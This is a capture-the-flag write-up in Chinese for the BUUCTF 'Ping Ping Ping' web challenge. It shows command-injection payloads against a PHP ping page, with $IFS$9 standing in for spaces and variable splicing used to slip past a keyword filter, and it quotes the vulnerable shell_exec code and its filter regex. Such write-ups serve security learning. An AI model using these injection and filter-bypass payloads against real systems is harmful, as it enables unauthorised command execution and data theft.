[BUUCTF][Web][GXYCTF2019]Ping Ping Ping 1

打开靶机对应URL

提示有ip参数

尝试构造url

http://714ad4a2-64e2-452b-8ab9-a38df80dc584.node4.buuoj.cn:81/?ip=127.0.0.1

显示

/?ip=
PING 127.0.0.1 (127.0.0.1): 56 data bytes

说明这里有命令注入的可能,构造url

http://714ad4a2-64e2-452b-8ab9-a38df80dc584.node4.buuoj.cn:81/?ip=127.0.0.1|ls

显示

/?ip=
flag.php
index.php

老套路，尝试看一下index.php

http://714ad4a2-64e2-452b-8ab9-a38df80dc584.node4.buuoj.cn:81/?ip=127.0.0.1|cat+index.php

显示

/?ip= fxck your space!

不可以用空格（即urlencode中的+）

知识点：
在linux中 $IFS$9 可以作为空格使用，这样可以绕过

构造url

http://714ad4a2-64e2-452b-8ab9-a38df80dc584.node4.buuoj.cn:81/?ip=127.0.0.1;cat$IFS$9index.php

显示

/?ip=
/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "
";
  print_r($a);
}

?>

从这里不接受空格，同时也不接受参数中带有f l a g 这顺序的四个字母

不过这里可以利用linux创建临时变量的方式绕过

构造参数(注意这里用; 不要用|，因为这里是或的意思，会导致后面的不用执行)

http://714ad4a2-64e2-452b-8ab9-a38df80dc584.node4.buuoj.cn:81/?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php

访问后，右键查看源代码 boom

/?ip=
<pre>PING 127.0.0.1 (127.0.0.1): 56 data bytes
<?php
$flag = "flag{7d941fbe-6c50-4df6-819c-038236ae7f77}";
?>